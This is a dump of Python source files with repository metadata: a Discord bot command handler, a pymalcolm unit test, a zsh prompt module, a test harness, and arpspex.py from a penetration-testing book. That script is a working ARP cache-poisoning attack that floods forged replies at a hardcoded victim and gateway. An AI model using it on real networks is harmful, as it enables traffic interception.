hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f659b0d045cb305375adfbb54ef5b317d1bd67ed | 8,327 | py | Python | system.py | Attachment-Studios/PackedBerry | cb1d47c00cce8d31d6d1e95b1ec2deb330a184e0 | [
"CNRI-Python"
] | null | null | null | system.py | Attachment-Studios/PackedBerry | cb1d47c00cce8d31d6d1e95b1ec2deb330a184e0 | [
"CNRI-Python"
] | null | null | null | system.py | Attachment-Studios/PackedBerry | cb1d47c00cce8d31d6d1e95b1ec2deb330a184e0 | [
"CNRI-Python"
] | null | null | null | # PackedBerry System
import requests
import random
import os
import youtubesearchpython
def search_video(query:str):
videosSearch = youtubesearchpython.VideosSearch(str(query), limit = 1)
return videosSearch.result()
def get_video_data(query: str):
    r = {}
    d = search_video(query)
    for _ in d:               # top-level key, e.g. 'result'
        l = d[_]              # list of video result dicts
        for e in l:
            f = e             # a single video dict
            for i in f:
                if i in ['link', 'title', 'duration', 'viewCount']:
                    r.update({i: f[i]})
    return r
def get_title(url: str):
html = requests.get(url).text
title_separator = html.split("<title>")
title = title_separator[1].split("</title>")[0]
return title
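# Note: get_title is a naive scrape; it assumes the page contains a literal
# "<title>" tag and raises IndexError otherwise (callers wrap it in try/except).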
vfile = open("data/version", "r")
version = vfile.read()
vfile.close()
hfile = open("data/help", "r")
help_data = hfile.read()
hfile.close()
wfile = open("data/whatsnew", "r")
whatsnew = wfile.read()
wfile.close()
def mute(uid, mute_list, guild_id, mute_server):
id_match = False
for elem in mute_list:
if str(elem) == str(uid):
id_match = True
break
server_match = False
for elem in mute_server:
if str(elem) == str(guild_id):
server_match = True
break
    return id_match and server_match
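# Illustrative: mute("123", ["123"], "42", ["42"]) -> True
# (user 123 is on the mute list and guild 42 is a muted server).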
def out(message, refname, client):
try:
msg = message.content.lower().split(" ")
out = ""
delete = False
connectVoice = False
voiceChannel = ""
song_url = ""
calls = refname
repeat = 1
mutelist = []
unmutelist = []
if msg[0] in refname[1]:
try:
if msg[1] in ["ver", "version"]:
out = version
elif msg[1] in ["whatsnew", "wn"]:
out = whatsnew
elif msg[1] == "help":
if len(msg) < 3:
help_file = open('data/help', 'r')
help_data = help_file.read()
help_file.close()
out = str(help_data)
else:
help_file = open('data/__help__', 'r')
help_data = help_file.read().split("***")
help_data.remove("")
help_file.close()
for _ in help_data:
list_ = _.split("\n")
list_.remove('')
if len(list_) > 0:
if list_[0] == msg[2]:
out = str(_)
break
if out == "":
out = "```yml\n*unavailable```"
elif msg[1] == "ping":
out = f"<@{message.author.id}>"
elif msg[1] == "sitename":
try:
site_url = str(message.content.split(" ")[2])
try:
title = get_title(site_url)
except:
title = "???"
out = title
except:
out = "Please provide URL."
elif msg[1] in ["connect", "join", "vibe"]:
try:
_msg = message.content.split(' ')
del _msg[0]
del _msg[0]
c = " ".join(_msg)
if c.replace(' ', '') == "":
out = "Please enter a valid channel name."
else:
voiceChannel = str(c)
out = f"Connected to {c}."
connectVoice = "<#>"
except Exception as e:
print(e)
elif msg[1] == "vibe-url":
try:
try:
try:
voiceChannel = str(message.content).replace( str(message.content.split(" ")[0]) + " " + str(message.content.split(" ")[1]) + " " + str(message.content.split(" ")[2] + " "), "" )
song_url = str(message.content.split(" ")[2])
try:
title = get_title(song_url)
except:
title = "???"
out = "Now vibing on " + title + "(<" + song_url + ">)!!!"
connectVoice = True
except:
out = "Error."
except:
out = "Please provide a voice channel to vibe in!"
except:
out = "Please provide an url to vibe on!"
elif msg[1] == "vibe-name":
try:
try:
try:
del msg[0]
del msg[0]
search_text = " ".join(msg)
if search_text.replace(' ', '') == '':
out = 'Search Text can not be empty.'
else:
song_url = str(get_video_data(search_text)['link'])
try:
title = get_title(song_url)
except:
title = "???"
out = "Now vibing on " + title + "(<" + song_url + ">)!!!"
connectVoice = True
except:
out = "Error."
except:
out = "Please provide a voice channel to vibe in!"
except:
out = "Please provide an url to vibe on!"
elif msg[1] == "novibe":
connectVoice = "-"
out = "Not vibing anymore."
elif msg[1] == "pausevibe":
connectVoice = "||"
out = "Waiting till start vibing again."
elif msg[1] == "resumevibe":
connectVoice = ">"
out = "Resuming vibing again."
elif msg[1] == "donevibe":
connectVoice = "<"
out = "Stopped vibing."
elif msg[1] == "spam":
if str(message.guild.id) in os.listdir('no-spam'):
out = "You can not use `spam` command in this server. To enable it type `<prefix> set-spam on`. Note by default if already wasn't set to, then spam max limit is 25. Be careful."
else:
try:
try:
try:
sf = open(f'set-spam/{message.guild.id}', 'r')
spam_limit = int(sf.read())
sf.close()
except:
spam_limit = 25
if int(msg[2]) <= spam_limit:
spam_text = ""
try:
spam_text = str(message.content).replace( str(message.content.split(" ")[0]) + " " + str(message.content.split(" ")[1]) + " " + str(message.content.split(" ")[2] + " "), "" )
except:
spam_text = ""
if spam_text.replace(" ", "") == '':
out = "Please provide text to spam."
else:
out = spam_text
repeat = int(msg[2])
else:
out = f"Spam amount limit is 0 to {spam_limit} only."
except:
out = "Spam amount should be a number."
except:
out = "Please specify an amount to spam."
elif msg[1] == "call":
try:
if str(msg[2]) not in calls[1]:
calls[1].append(str(msg[2]))
out = 'Added name option - ' + str(message.content.split(' ')[2]) + '. Now you can use ' + str(message.content.split(' ')[2]) + ' as prefix to start a PackedBerry command.'
except:
all_names = "```"
called = []
for name in calls[1]:
if name not in called:
all_names = all_names + '\n' + str(name)
called.append(name)
all_names = all_names + '\n```'
out = str(all_names)
elif msg[1] == "nocall":
try:
if str(msg[2]) in calls[1]:
calls[1].remove(str(msg[2]))
if str(msg[2]) in calls[0]:
out = 'Can not remove system default names!'
else:
out = 'Removed name option - ' + str(message.content.split(' ')[2]) + '. Now you can not use ' + str(message.content.split(' ')[2]) + ' as prefix to start a PackedBerry command.'
for name in calls[0]:
if name not in calls[1]:
calls[1].append(name)
except:
out = 'Please provide a name!'
elif msg[1] == "mute":
try:
if message.author.guild_permissions.administrator:
id = str(msg[2]).replace('<', '').replace('>', '').replace('!', '').replace('@', '')
if id == str(781701773713997824):
out = ["Dare you talk to my creator like that again. :rage:", "You can not mute a god.", "This is an action of Violence against PackedBerry."][random.randint(0, 2)]
elif id == str(message.author.id):
out = 'Are you serious or just want to punish yourself?'
else:
mutelist.append(str(msg[2]).replace('<', '').replace('>', '').replace('!', '').replace('@', ''))
out = f'{msg[2]} was muted.'
else:
out = 'YOOOOOOOOOOOOOOOOLLLLLLLLlllll! You Not The Admin!'
except:
out = 'Please provide user to mute.'
elif msg[1] == "unmute":
try:
if message.author.guild_permissions.administrator:
unmutelist.append(str(msg[2]).replace('<', '').replace('>', '').replace('!', '').replace('@', ''))
out = f'{msg[2]} was unmuted.'
else:
out = 'YOOOOOOOOOOOOOOOOLLLLLLLLlllll! You Not The Admin!'
except:
out = 'Please provide user to unmute.'
elif msg[1] == "img":
try:
out = f"https://picsum.photos/seed/{ str(msg[2]) }/1920/1080"
except:
out = f"https://picsum.photos/seed/{ random.randint(1, 1000000) }/1920/1080"
except:
out = "Yes!?"
else:
pass
        return_value = [
            not (out == ""),  # whether there is anything to send
            out,              # response text
            delete,           # whether to delete the triggering message
            connectVoice,     # voice action flag ("<#>", True, "-", "||", ">", "<" or False)
            voiceChannel,     # target voice channel name
            song_url,         # URL to vibe on
            repeat,           # how many times to send `out`
            calls,            # updated prefix/name lists
            mutelist,         # user ids to mute
            unmutelist        # user ids to unmute
        ]
return return_value
except:
pass
| 29.424028 | 185 | 0.549418 | 1,067 | 8,327 | 4.20806 | 0.200562 | 0.016036 | 0.03029 | 0.058797 | 0.36147 | 0.335412 | 0.295991 | 0.257016 | 0.257016 | 0.257016 | 0 | 0.019357 | 0.286538 | 8,327 | 282 | 186 | 29.528369 | 0.736408 | 0.002162 | 0 | 0.324627 | 0 | 0.003731 | 0.21635 | 0.016133 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018657 | false | 0.007463 | 0.014925 | 0 | 0.05597 | 0.003731 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f65acd232e8fbfd6fb6fb9d47b48f78f7cfaabe4 | 2,623 | py | Python | tests/test_modules/test_system/test_iociconpart.py | hir12111/pymalcolm | 689542711ff903ee99876c40fc0eae8015e13314 | [
"Apache-2.0"
] | 11 | 2016-10-04T23:11:39.000Z | 2022-01-25T15:44:43.000Z | tests/test_modules/test_system/test_iociconpart.py | hir12111/pymalcolm | 689542711ff903ee99876c40fc0eae8015e13314 | [
"Apache-2.0"
] | 153 | 2016-06-01T13:31:02.000Z | 2022-03-31T11:17:18.000Z | tests/test_modules/test_system/test_iociconpart.py | hir12111/pymalcolm | 689542711ff903ee99876c40fc0eae8015e13314 | [
"Apache-2.0"
] | 16 | 2016-06-10T13:45:27.000Z | 2020-10-24T13:45:04.000Z | import os
import unittest
from mock import ANY, patch
from malcolm.core import Context, Process, StringMeta
from malcolm.modules.ca.util import catools
from malcolm.modules.scanning.controllers import RunnableController
from malcolm.modules.system.parts import IocIconPart
defaultIcon = ""
with open(
os.path.split(__file__)[0] + "/../../../malcolm/modules/system/icons/epics-logo.svg"
) as f:
defaultIcon = f.read()
vxIcon = ""
with open(
os.path.split(__file__)[0] + "/../../../malcolm/modules/system/icons/vx_epics.svg"
) as f:
vxIcon = f.read()
linuxIcon = ""
with open(
os.path.split(__file__)[0]
+ "/../../../malcolm/modules/system/icons/linux_epics.svg"
) as f:
linuxIcon = f.read()
winIcon = ""
with open(
os.path.split(__file__)[0] + "/../../../malcolm/modules/system/icons/win_epics.svg"
) as f:
winIcon = f.read()
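# MockPv below is a minimal stand-in for a catools PV value (illustrative):
# a str subclass carrying the `ok` flag that augmented ca values expose.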
class MockPv(str):
ok = True
class TestIocIconPart(unittest.TestCase):
def add_part_and_start(self):
self.icon = IocIconPart(
"ICON",
os.path.split(__file__)[0]
+ "/../../../malcolm/modules/system/icons/epics-logo.svg",
)
self.c1.add_part(self.icon)
self.p.add_controller(self.c1)
self.p.start()
def setUp(self):
self.p = Process("process1")
self.context = Context(self.p)
self.c1 = RunnableController(mri="SYS", config_dir="/tmp", use_git=False)
def tearDown(self):
self.p.stop(timeout=1)
@patch("malcolm.modules.ca.util.CAAttribute")
def test_has_pv(self, CAAttribute):
self.add_part_and_start()
CAAttribute.assert_called_once_with(
ANY,
catools.DBR_STRING,
"",
"ICON:KERNEL_VERS",
throw=False,
callback=self.icon.update_icon,
)
assert isinstance(CAAttribute.call_args[0][0], StringMeta)
meta = CAAttribute.call_args[0][0]
assert meta.description == "Host Architecture"
assert not meta.writeable
assert len(meta.tags) == 0
def test_adds_correct_icons(self):
self.add_part_and_start()
assert self.context.block_view("SYS").icon.value == defaultIcon
arch = MockPv("windows")
self.icon.update_icon(arch)
assert self.context.block_view("SYS").icon.value == winIcon
arch = MockPv("WIND")
self.icon.update_icon(arch)
assert self.context.block_view("SYS").icon.value == vxIcon
arch = MockPv("linux")
self.icon.update_icon(arch)
assert self.context.block_view("SYS").icon.value == linuxIcon
| 28.51087 | 88 | 0.629813 | 329 | 2,623 | 4.851064 | 0.322188 | 0.078947 | 0.075188 | 0.046992 | 0.350251 | 0.300125 | 0.300125 | 0.300125 | 0.276316 | 0.276316 | 0 | 0.007393 | 0.226458 | 2,623 | 91 | 89 | 28.824176 | 0.779202 | 0 | 0 | 0.202703 | 0 | 0 | 0.14411 | 0.11361 | 0 | 0 | 0 | 0 | 0.121622 | 1 | 0.067568 | false | 0 | 0.094595 | 0 | 0.202703 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f65d05ee6da3acc0082713c25be1c98fa8f80dcf | 763 | py | Python | Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/arpspex.py | kaisaryousuf/Python-Penetration-Testing-Essentials-Second-Edition | f2a666b62826b4adc334a8e69ccbfe20b5cf12c2 | [
"MIT"
] | 18 | 2018-06-04T08:27:25.000Z | 2022-02-24T02:08:51.000Z | Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/arpspex.py | kaisaryousuf/Python-Penetration-Testing-Essentials-Second-Edition | f2a666b62826b4adc334a8e69ccbfe20b5cf12c2 | [
"MIT"
] | null | null | null | Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/arpspex.py | kaisaryousuf/Python-Penetration-Testing-Essentials-Second-Edition | f2a666b62826b4adc334a8e69ccbfe20b5cf12c2 | [
"MIT"
] | 11 | 2018-04-12T00:43:49.000Z | 2022-03-13T18:24:55.000Z | import socket
import struct
import binascii
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
s.bind(("eth0",socket.htons(0x0800)))
sor = '\x00\x0c\x29\x4f\x8e\x35'
victmac ='\x88\x53\x2e\x0a\x75\x3f'
gatemac = '\x84\x1b\x5e\x50\xc8\x6e'
code ='\x08\x06'
eth1 = victmac + sor + code  # Ethernet header for the victim's frame
eth2 = gatemac + sor + code  # Ethernet header for the gateway's frame
htype = '\x00\x01'
protype = '\x08\x00'
hsize = '\x06'
psize = '\x04'
opcode = '\x00\x02'
gate_ip = '10.0.0.1'
victim_ip = '10.0.0.6'
gip = socket.inet_aton(gate_ip)
vip = socket.inet_aton(victim_ip)
arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip
arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip
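# Frame layout (illustrative): a 14-byte Ethernet header (dst MAC, src MAC,
# EtherType 0x0806 = ARP) followed by a 28-byte ARP reply (opcode 0x0002) that
# tells the victim the gateway's IP lives at our MAC, and vice versa. The
# replies are re-sent in the loop below to keep both ARP caches poisoned.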
while 1:
s.send(arp_victim)
s.send(arp_gateway)
| 21.194444 | 74 | 0.711664 | 131 | 763 | 4.053435 | 0.48855 | 0.045198 | 0.037665 | 0.022599 | 0.116761 | 0.116761 | 0 | 0 | 0 | 0 | 0 | 0.106667 | 0.115334 | 763 | 35 | 75 | 21.8 | 0.68 | 0.028834 | 0 | 0 | 0 | 0 | 0.179104 | 0.097693 | 0 | 0 | 0.016282 | 0 | 0 | 1 | 0 | false | 0 | 0.12 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f66035f56d78b423d31ea48cacdd05224e0feb79 | 1,311 | py | Python | snakypy/zshpower/prompt/sections/hostname.py | williamcanin/zshpower | 797533b60cd7f9dbd8cf2162db9a19d970a7be33 | [
"MIT"
] | 10 | 2020-04-03T20:39:44.000Z | 2021-12-09T22:26:56.000Z | snakypy/zshpower/prompt/sections/hostname.py | williamcanin/zshpower | 797533b60cd7f9dbd8cf2162db9a19d970a7be33 | [
"MIT"
] | 9 | 2021-05-15T13:26:48.000Z | 2021-11-15T07:03:00.000Z | snakypy/zshpower/prompt/sections/hostname.py | williamcanin/zshpower | 797533b60cd7f9dbd8cf2162db9a19d970a7be33 | [
"MIT"
] | 2 | 2020-04-22T08:50:11.000Z | 2021-06-23T05:03:02.000Z | from os import environ as os_environ
from socket import gethostname
from snakypy.zshpower.utils.catch import get_key
from .utils import Color, element_spacing, symbol_ssh
class Hostname:
def __init__(self, config: dict):
self.config: dict = config
self.symbol = symbol_ssh(get_key(config, "hostname", "symbol"), "")
self.hostname_enable = get_key(config, "hostname", "enable")
self.hostname_color = get_key(config, "hostname", "color")
self.hostname_prefix_color = get_key(config, "hostname", "prefix", "color")
self.hostname_prefix_text = element_spacing(
get_key(config, "hostname", "prefix", "text")
)
def __str__(self, prefix: str = "", space_elem: str = " ") -> str:
if (
get_key(self.config, "hostname", "enable") is True
or "SSH_CONNECTION" in os_environ
):
prefix = (
f"{Color(self.hostname_prefix_color)}"
f"{self.hostname_prefix_text}"
f"{Color().NONE}"
)
if "SSH_CONNECTION" in os_environ or self.hostname_enable:
return (
f"{prefix}{Color(self.hostname_color)}{self.symbol}"
f"{gethostname()}{space_elem}{Color().NONE}"
)
return ""
| 34.5 | 83 | 0.592677 | 150 | 1,311 | 4.926667 | 0.266667 | 0.129905 | 0.081191 | 0.135318 | 0.244926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.283753 | 1,311 | 37 | 84 | 35.432432 | 0.787007 | 0 | 0 | 0 | 0 | 0 | 0.218917 | 0.115942 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.133333 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
f6618a1b92f87b0c01aea0561400b4b29521929e | 9,067 | py | Python | src/main/resources/templates/c/gcc/test/testUtils/AbstractTest.py | AutoscanForJavaFork/Artemis | 43a1da12e5dc6a2f54ec8c29f9f4512520fb0c46 | [
"MIT"
] | 213 | 2019-06-20T19:22:05.000Z | 2022-03-29T14:49:53.000Z | src/main/resources/templates/c/gcc/test/testUtils/AbstractTest.py | AutoscanForJavaFork/Artemis | 43a1da12e5dc6a2f54ec8c29f9f4512520fb0c46 | [
"MIT"
] | 2,992 | 2019-06-19T13:40:38.000Z | 2022-03-31T21:17:12.000Z | src/main/resources/templates/c/test/testUtils/AbstractTest.py | FreshLlamanade/Artemis | 19d971ea76e0218cc21936da567b5e2cc3c200e4 | [
"MIT"
] | 365 | 2019-07-30T11:30:58.000Z | 2022-03-22T07:23:16.000Z | from abc import ABC, abstractmethod
from traceback import print_exc
from signal import SIGALRM, SIG_IGN, alarm, signal
from datetime import datetime, timedelta
from contextlib import contextmanager
from typing import Optional, List, Dict
from os import path, makedirs
from io import TextIOWrapper
from testUtils.junit.TestSuite import TestSuite
from testUtils.junit.TestCase import TestCase, Result
from testUtils.Utils import printTester, PWrap
from testUtils.TestFailedError import TestFailedError
# Timeout handler based on: https://www.jujens.eu/posts/en/2018/Jun/02/python-timeout-function/
class AbstractTest(ABC):
"""
    An abstract test that every test has to inherit from.
How to:
1. Inherit from AbstractTest
2. Override the "_run()" method.
3. Override the "_onTimeout()" method.
4. Override the "_onFailed()" method.
5. Done
"""
name: str
requirements: List[str]
timeoutSec: int
case: Optional[TestCase]
suite: Optional[TestSuite]
def __init__(self, name: str, requirements: List[str] = None, timeoutSec: int = -1):
"""
        name: str
            A unique test case name.
        requirements: List[str]
            A list of test case names that have to finish successfully for this test to run.
            Usually an execution test should have the compile test as its requirement.
        timeoutSec: int
            The test case timeout in seconds.
"""
self.name = name
self.timeoutSec = timeoutSec
self.requirements = list() if requirements is None else requirements
self.case: Optional[TestCase] = None
self.suite: Optional[TestSuite] = None
def start(self, testResults: Dict[str, Result], suite: TestSuite):
"""
Starts the test run.
---
testResults: Dict[str, Result]
All test results up to this point.
suite: TestSuite
The test suite where this test should get added to.
"""
self.suite = suite
self.case = TestCase(self.name)
# Check if all test requirements (other tests) are fulfilled:
if not self.__checkTestRequirements(testResults):
printTester(f"Skipping test case '{self.name}' not all requirements ({str(self.requirements)}) are fulfilled")
self.case.message = f"Test requires other test cases to succeed first ({str(self.requirements)})"
self.case.result = Result.SKIPPED
self.case.stdout = ""
self.case.stderr = ""
self.case.time = timedelta()
self.suite.addCase(self.case)
return
startTime: datetime = datetime.now()
self._initOutputDirectory()
if self.timeoutSec > 0:
# Run with timeout:
with self.__timeout(self.timeoutSec):
try:
self._run()
except TestFailedError:
printTester(f"'{self.name}' failed.")
except TimeoutError:
self._timeout()
except Exception as e:
self.__markAsFailed(f"'{self.name}' had an internal error. {str(e)}.\nPlease report this on Moodle (Detailfragen zu Programmieraufgaben)!")
print_exc()
self._onFailed()
else:
# Run without timeout:
try:
self._run()
except TestFailedError:
printTester(f"'{self.name}' failed.")
except Exception as e:
self.__markAsFailed(f"'{self.name}' had an internal error. {str(e)}.\nPlease report this on Moodle (Detailfragen zu Programmieraufgaben)!")
print_exc()
self._onFailed()
self.case.time = datetime.now() - startTime
self.suite.addCase(self.case)
def __checkTestRequirements(self, testResults: Dict[str, Result]):
"""
        Checks if all requirements (i.e. other test cases were successful) are fulfilled.
"""
for req in self.requirements:
if (not req in testResults) or (testResults[req] != Result.SUCCESS):
return False
return True
@contextmanager
def __timeout(self, timeoutSec: int):
# Register a function to raise a TimeoutError on the signal.
signal(SIGALRM, self.__raiseTimeout)
        # Schedule the signal to be sent after ``timeoutSec`` seconds.
alarm(timeoutSec)
try:
yield
except TimeoutError:
pass
finally:
# Unregister the signal so it won't be triggered
# if the timeout is not reached.
signal(SIGALRM, SIG_IGN)
def __raiseTimeout(self, sigNum: int, frame):
self._onTimeout()
raise TimeoutError
def _failWith(self, msg: str):
"""
Marks the current test as failed with the given message.
Stores the complete stderr and stdout output from the run.
"""
self.__markAsFailed(msg)
self._onFailed()
raise TestFailedError(f"{self.name} failed.")
def __markAsFailed(self, msg: str):
"""
Marks the current test case as failed and loads all stdout and stderr.
"""
self.case.message = msg
self.case.result = Result.FAILURE
self.case.stdout = self._loadFullStdout()
self.case.stderr = self._loadFullStderr()
printTester(f"Test {self.name} failed with: {msg}")
def _timeout(self, msg: str = ""):
"""
Marks the current test as failed with the given optional message.
Stores the complete stderr and stdout output from the run.
        Should be called once a test timeout occurs.
"""
if msg:
self.__markAsFailed(f"timeout ({msg})")
else:
self.__markAsFailed("timeout")
def __loadFileContent(self, filePath: str):
"""
Returns the content of a file specified by filePath as string.
"""
if path.exists(filePath) and path.isfile(filePath):
file: TextIOWrapper = open(filePath, "r")
content: str = file.read()
file.close()
return content
return ""
def _loadFullStdout(self):
"""
        Returns the stdout output of the executable.
"""
filePath: str = self._getStdoutFilePath()
return self.__loadFileContent(filePath)
def _loadFullStderr(self):
"""
Returns the stderr output of the executable.
"""
filePath: str = self._getStderrFilePath()
return self.__loadFileContent(filePath)
def _initOutputDirectory(self):
"""
Prepares the output directory for the stderr and stdout files.
"""
outDir: str = self._getOutputPath()
if path.exists(outDir) and path.isdir(outDir):
return
makedirs(outDir)
def _getOutputPath(self):
"""
Returns the output path for temporary stuff like the stderr and stdout files.
"""
return path.join("/tmp", self.suite.name, self.name)
def _getStdoutFilePath(self):
"""
Returns the path of the stdout cache file.
"""
return path.join(self._getOutputPath(), "stdout.txt")
def _getStderrFilePath(self):
"""
Returns the path of the stderr cache file.
"""
return path.join(self._getOutputPath(), "stderr.txt")
def _createPWrap(self, cmd: List[str], cwd:Optional[str] = None):
"""
        Creates a new PWrap instance from the given command.
"""
return PWrap(cmd, self._getStdoutFilePath(), self._getStderrFilePath(), cwd=cwd)
def _startPWrap(self, pWrap: PWrap):
"""
Starts the PWrap execution.
        Handles FileNotFoundError if, for example, the executable was not found or does not exist.
"""
try:
pWrap.start()
except FileNotFoundError as fe:
printTester(str(fe))
self._failWith("File not found for execution. Did compiling fail?")
except NotADirectoryError as de:
printTester(str(de))
self._failWith(f"Directory '{pWrap.cwd}' does not exist.")
except PermissionError as pe:
printTester(str(pe))
self._failWith("Missing file execution permission. Make sure it has execute rights (chmod +x <FILE_NAME>).")
@abstractmethod
def _run(self):
"""
Implement your test run here.
"""
pass
@abstractmethod
def _onTimeout(self):
"""
        Called once a timeout occurs.
Should cancel all outstanding actions and free all resources.
"""
pass
@abstractmethod
def _onFailed(self):
"""
Called once the test failed via "_failWith(msg: str)".
Should cancel all outstanding actions and free all allocated resources.
"""
pass
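# Minimal usage sketch (illustrative only; not part of the shipped tests):
#
#   class AlwaysFails(AbstractTest):
#       def _run(self):
#           self._failWith("not implemented")
#       def _onTimeout(self):
#           pass
#       def _onFailed(self):
#           pass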
